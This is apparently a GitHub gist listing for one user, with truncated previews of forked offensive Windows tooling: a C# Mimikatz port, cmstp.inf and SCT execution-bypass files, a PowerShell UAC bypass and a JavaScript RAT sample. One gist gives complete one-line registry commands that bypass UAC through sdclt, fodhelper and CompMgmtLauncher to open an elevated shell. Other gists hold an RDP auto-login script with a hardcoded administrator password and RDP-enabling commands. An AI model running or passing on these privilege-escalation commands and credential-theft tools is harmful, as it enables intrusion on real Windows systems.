AhmedSakrr
/ katz.cs
Created
January 2, 2019 22:10
— forked from api0cradle/katz.cs
Updated Katz.cs - Latest Mimikatz, I mean honestly it is 2018...
This file has been truncated, but you can view the full file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.IO; | |
| using System.Text; | |
| using System.IO.Compression; | |
| using System.EnterpriseServices; | |
| using System.Collections.Generic; | |
| using System.Runtime.InteropServices; | |
| using System.Security.Cryptography; | |
| /* |
AhmedSakrr
/ cmstp.inf
Created
January 2, 2019 22:11
— forked from api0cradle/cmstp.inf
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ;cmstp.exe cmstp.inf | |
| [version] | |
| Signature=$chicago$ | |
| AdvancedINF=2.5 | |
| [DefaultInstall_SingleUser] | |
| UnRegisterOCXs=UnRegisterOCXSection | |
| [UnRegisterOCXSection] |
AhmedSakrr
/ powersct.sct
Created
January 2, 2019 22:11
— forked from api0cradle/powersct.sct
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version="1.0" encoding="utf-8"?> | |
| <package> | |
| <component | |
| id="dummy"> | |
| <registration | |
| description="dummy" | |
| progid="dummy" | |
| version="1.00" | |
| remotable="True"> | |
| <script |
AhmedSakrr
/ UACBypass.ps1
Created
January 4, 2019 23:03
— forked from mattifestation/UACBypass.ps1
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Invoke-UACBypass { | |
| <# | |
| .SYNOPSIS | |
| Bypasses UAC on Windows 10 by abusing the SilentCleanup task to win a race condition, allowing for a DLL hijack without a privileged file copy. | |
| Author: Matthew Graeber (@mattifestation), Matt Nelson (@enigma0x3) | |
| License: BSD 3-Clause | |
| Required Dependencies: None | |
| Optional Dependencies: None |
AhmedSakrr
/ .cmd
Created
January 14, 2019 01:00
— forked from xillwillx/.cmd
UAC bypass methods with high integrity - credits to @enigma0x3 / @0rbz_ / @winscripting
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| **UAC bypass for Win10:** | |
| reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /d "cmd.exe" /f && START /W sdclt.exe && reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /f | |
| **UAC bypass for Win10:** | |
| reg add HKCU\Software\Classes\ms-settings\shell\open\command /v "DelegateExecute" /f && reg add HKCU\Software\Classes\ms-settings\shell\open\command /d "cmd /c start powershell.exe" /f && START /W fodhelper.exe && reg delete HKCU\Software\Classes\ms-settings /f | |
| **UAC bypass for 7/8/10:** | |
| reg add HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command /d "cmd.exe" /f && START /W CompMgmtLauncher.exe && reg delete HKEY_CURRENT_USER\Software\Classes\mscfile /f |
AhmedSakrr
/ JavaScript RAT
Created
May 17, 2019 06:36
— forked from JohnLaTwC/JavaScript RAT
JavaScript RAT
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## uploaded by @JohnLaTwC | |
| ## sample hash: 1d37e2a657ccc595c7a5544df6fd2d35739455f3fdbc2d2700835873130befde | |
| <html> | |
| <head> | |
| <script language="JScript"> | |
| window.resizeTo(1, 1); | |
| window.moveTo(-2000, -2000); | |
| window.blur(); | |
| try |
AhmedSakrr
/ testdevice.js
Created
November 11, 2019 22:18
— forked from vladignatyev/testdevice.js
Get hardware data from Browser to implement vendor and hardware lock like Google and other shit companies do
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| console.log("CPU/OS: " + navigator.oscpu); | |
| console.log("Cores count: " + navigator.hardwareConcurrency); | |
| console.log("RAM: " + navigator.deviceMemory); | |
| console.log("Plaform: " + navigator.platform); | |
| console.log("Browser info: " + navigator.userAgent); | |
| console.log("Browser info: " + navigator.product + " " + navigator.productSub); | |
| console.log("Browser info: " + navigator.appCodeName); | |
| console.log("Browser info: " + navigator.appName); | |
| console.log("Browser info: " + navigator.appVersion); | |
| console.log("Vendor: " + navigator.vendor + " " + navigator.vendorSub); |
AhmedSakrr
/ connect.ps1
Created
February 24, 2021 12:49
— forked from jdforsythe/connect.ps1
Remote Desktop Auto Login Powershell Script
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| echo "Connecting to 192.168.1.100" | |
| $Server="192.168.1.100" | |
| $User="Administrator" | |
| $Password="AdminPassword" | |
| cmdkey /generic:TERMSRV/$Server /user:$User /pass:$Password | |
| mstsc /v:$Server |
AhmedSakrr
/ enable-rdp.ps1
Created
February 24, 2021 13:04
— forked from jhorsman/enable-rdp.ps1
Enable Windows Remote Desktop Connection with PowerShell
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # run as administrator | |
| # reboot afterwards | |
| Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server'-name "fDenyTSConnections" -Value 0 | |
| Enable-NetFirewallRule -DisplayGroup "Remote Desktop" | |
| Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -name "UserAuthentication" -Value 1 |
AhmedSakrr
/ Enable Remote Desktop with PowerShell
Created
February 24, 2021 13:06
— forked from kmondesir/Enable Remote Desktop with PowerShell
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Make sure to run the shell with administrator credentials | |
| Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -name "fDenyTSConnections" -value 0 | |
| Enable-NetFirewallRule -DisplayGroup "Remote Desktop" |
OlderNewer